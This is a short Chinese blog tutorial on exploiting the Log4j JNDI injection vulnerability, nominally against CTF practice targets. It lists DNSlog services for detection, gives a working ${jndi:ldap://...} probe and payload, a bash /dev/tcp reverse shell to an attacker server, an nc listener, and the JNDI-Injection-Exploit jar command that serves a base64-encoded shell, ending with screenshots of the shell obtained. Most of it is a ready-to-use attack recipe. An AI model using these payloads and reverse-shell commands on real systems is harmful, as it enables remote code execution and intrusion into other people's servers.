服务器到期的最后几个小时 先操作一波~
![](https://img.haomeiwen.com/i12653063/2fba847566356ffa.png)
一:准备环境:
1:exp jar包 JNDI-Injection-Exploit
2:利用dnslog平台做初步验证
随意哪个都可以
ceye.io
dnslog.link
dnslog.cn
dnslog.io
tu4.org awvsscan119.autoverify.cn burpcollaborator.net
sox.cn
3:一台服务器作为反弹shell监听, 如果没有服务器可以去百度下NATappAPP、花生壳等做本机隐射
4:靶机平台百度搜一堆, 封神台、cftshow等
5:注意的坑:服务器端口需要开放, 服务器若是在阿里云、腾讯云直接装宝塔(作为一个PHP叼毛开发用宝塔是真香,商城中的各种环境,文件上传,开端口等~~~)
二: 初入探测是否存在Log4j漏洞
1: 先去dnslog获取一个地址,提交到cft练手(靶机)的平台,看是否存在Log4j日志漏洞
![](https://img.haomeiwen.com/i12653063/c9f4998de3df6d6b.png)
漏洞基于ldap协议 , 提交到靶场的平台。
${jndi:ldap://e4654ec9.dns.1433.eu.org.}
提交后dns解析返回 , 确定存在该漏洞。
![](https://img.haomeiwen.com/i12653063/fbe81ab0e623606e.png)
三: 反弹Log4j漏洞shell
常用的监听shell
bash -i >& /dev/tcp/服务器地址/5555<&2
nc -lvvp 5555
1: 对bash -i 进行base64编码(http://tool.chinaz.com/tools/base64.aspx)
2: 使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base编码内容}|{base64,-d}|{bash,-i}" -A "服务器地址"
3:利用ldap协议,生成的poc直接打
${jndi:ldap://服务器地址/v0tgsl}
![](https://img.haomeiwen.com/i12653063/bc2f459d61f7a040.png)
反弹shell:
![](https://img.haomeiwen.com/i12653063/23abfc3a39c317c8.png)
网友评论